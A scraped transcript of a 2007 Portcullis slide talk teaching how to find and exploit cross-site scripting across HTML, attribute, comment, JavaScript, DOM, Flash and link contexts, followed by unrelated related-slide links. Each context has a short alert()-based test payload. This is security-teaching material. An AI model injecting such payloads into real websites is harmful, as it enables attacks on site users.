Portcullis Computer Security www portcullissecurity com 1252020 Portcullis
- Slides: 27
Portcullis Computer Security www. portcullis-security. com 12/5/2020 Portcullis Computer Security Limited 2007 1
How to detect and exploit %99 of XSS Vulnerabilities 12/5/2020 Portcullis Computer Security Limited 2007 2
XSS? So What? • Recently XSS has proven to be dangerous enough to consider. • And it allows you to jump into VPN or it allows you to bypass firewall rules via XSS Tunnelling. 12/5/2020 Portcullis Computer Security Limited 2007 3
What is it about? • It’s all about where output goes… • • 12/5/2020 Straight into HTML Into Javascript / Vb. Script block As tag attribute And some other rare, strange places… Portcullis Computer Security Limited 2007 4
Understanding exploiting XSS • It’s like SQL injection but now our subsystem is not a database it’s a browser and instead of a single quote we’ve got some new meta characters. 12/5/2020 Portcullis Computer Security Limited 2007 5
Ultimate Challenge • Ultimate challenge of XSS issues is able to escape current block and make browsers render your piece of code. 12/5/2020 Portcullis Computer Security Limited 2007 6
XSS Types These are most common XSS examples which you are going to see in the wild. I’ll try to show a demo to exploit them. • HTML – Normal • HTML – Attribute without quotes • HTML – Attribute with single quotes • HTML – In Comments • HTML – In Javascript Blocks • DOM based XSS • Flash based XSS • Direct Linking 12/5/2020 Portcullis Computer Security Limited 2007 7
Not Covered Before jumping into exploiting these specific issues; Following rare but has seen concepts are not covered in this talk. • • • XAS – Cross Application Scripting Security Zones of IE Client-Site issues like. jar problem Advanced Flash Analyzes for XSS Exploiting XSS in real world Bypassing HTML parsing based XSS filters like gmail, myspace etc. 12/5/2020 Portcullis Computer Security Limited 2007 8
HTML - Normal • Most common XSS type, At least it was the most common one. But nowadays most of the developers aware of it. • In this demo we assumed there is no filtering in the server-side. 12/5/2020 Portcullis Computer Security Limited 2007 9
HTML - Normal DEMO <script>alert(0 x 1)</script> 12/5/2020 Portcullis Computer Security Limited 2007 10
HTML – Attributes without Quotes • When output used as an HTML attribute in the application, if it’s coded in a sloppy HTML which has no quotes around it even if there is a server-side filtering we can bypass it! 12/5/2020 Portcullis Computer Security Limited 2007 11
HTML – Attributes without Quotes DEMO %20 onload=alert(0 x 2)%20 12/5/2020 Portcullis Computer Security Limited 2007 12
HTML – Attributes with Single Quotes • Wrapping HTML attributes with a single quote is quite common, valid but a poor practice. • Since single quote is not considered as HTML meta character is not encoded by any of default XSS filter functions like html_entities() or Server. HTMLEncode() 12/5/2020 Portcullis Computer Security Limited 2007 13
HTML –Attributes with Single Quotes DEMO ’ onload=alert(0 x 3) 12/5/2020 Portcullis Computer Security Limited 2007 14
HTML – In Comments • If output goes into an HTML comment we need “>” closing tag. • This will be encoded by default filters, so it should be unfiltered. 12/5/2020 Portcullis Computer Security Limited 2007 15
HTML – In Comments DEMO --!><script>alert(0 x 4)</script> 12/5/2020 Portcullis Computer Security Limited 2007 16
HTML – Javascript Blocks • Javascript blocks are too dangerous because meta characters are changing in there. If output goes into javascript we are not tag opener any more or double quotes. • It all depends where it goes in Javascript, we may need a single quote, may need a double quotes or maybe only a space or semi column. 12/5/2020 Portcullis Computer Security Limited 2007 17
HTML – In Comments DEMO ; alert(0 x 5) 12/5/2020 Portcullis Computer Security Limited 2007 18
HTML – DOM Based • This is one of the most rare and hard to spot XSS types. • You need a simple source code analyse over the script code. • Most of DOM based XSS issues can not be identified by automated scanners (to be honest non of them!) 12/5/2020 Portcullis Computer Security Limited 2007 19
HTML – In Comments DEMO #alert(0 x 6) 12/5/2020 Portcullis Computer Security Limited 2007 20
HTML – Flash Based XSS • It’s being more and more popular • There are several ways to see an XSS issue in Flash but most common ones • Remote flash file loading • Direct Linking • Flash application generally load remote resources and if this resources can be controlled by parameters then it can be called directly and can be forced to call a remote malisious flash object. 12/5/2020 Portcullis Computer Security Limited 2007 21
HTML – Flash Based XSS DEMO vuln. swf? player=http: //example. com/xss. swf _get. URL(‘javascript: alert(0 x 7)’) 12/5/2020 Portcullis Computer Security Limited 2007 22
HTML – Direct Linking • If linking functionality exist almost, always vulnerable to this attack! • It can be something like • Your e-mail address • Homepage URL • Your photo URL etc…. 12/5/2020 Portcullis Computer Security Limited 2007 23
HTML – Flash Based XSS DEMO javascript: alert(0 x 8) 12/5/2020 Portcullis Computer Security Limited 2007 24
Final Words • If a XSS issue is exploitable in Internet Explorer it’s highly possibly exploitable in Mozilla based browser, attack vector may differs. • CSS expression() and –moz-binding can allow you to trigger XSS payloads onload 12/5/2020 Portcullis Computer Security Limited 2007 25
Final Words • Know what you send… • Your browser can do some encoding which may invalidate your XSS test • To able to exploit target server you may need to send HTML characters without proper encoding • Confirm what you send from your proxy and be sure you tested it with encoding and without encoding 12/5/2020 Portcullis Computer Security Limited 2007 26
vbscript: msgbox(‘Any Questions? ’) 12/5/2020 Portcullis Computer Security Limited 2007 27
- Portcullis computer security
- Bài thơ mẹ đi làm từ sáng sớm
- Cơm
- Portcullis seed
- Private securit
- Osi security architecture in network security
- Security guide to network security fundamentals
- Wireless security in cryptography and network security
- Visa international security model diagram
- Electronic mail security in network security
- Cnss security model 27 cells example
- Integrity in e commerce
- Building security software
- Security guide to network security fundamentals
- Security guide to network security fundamentals
- Components of computer security
- Legal ethical and professional aspects of security
- Legal and ethical issues in computer security
- Computer ethics and cyber security
- Computer security tutorial
- Computer security 161 cryptocurrency lecture
- Computer security principles and practice 4th edition
- Computer security principles and practice solutions
- Computer security dieter gollmann
- Computer security handbook
- 395495
- Hru
- Attack sophistication vs intruder technical knowledge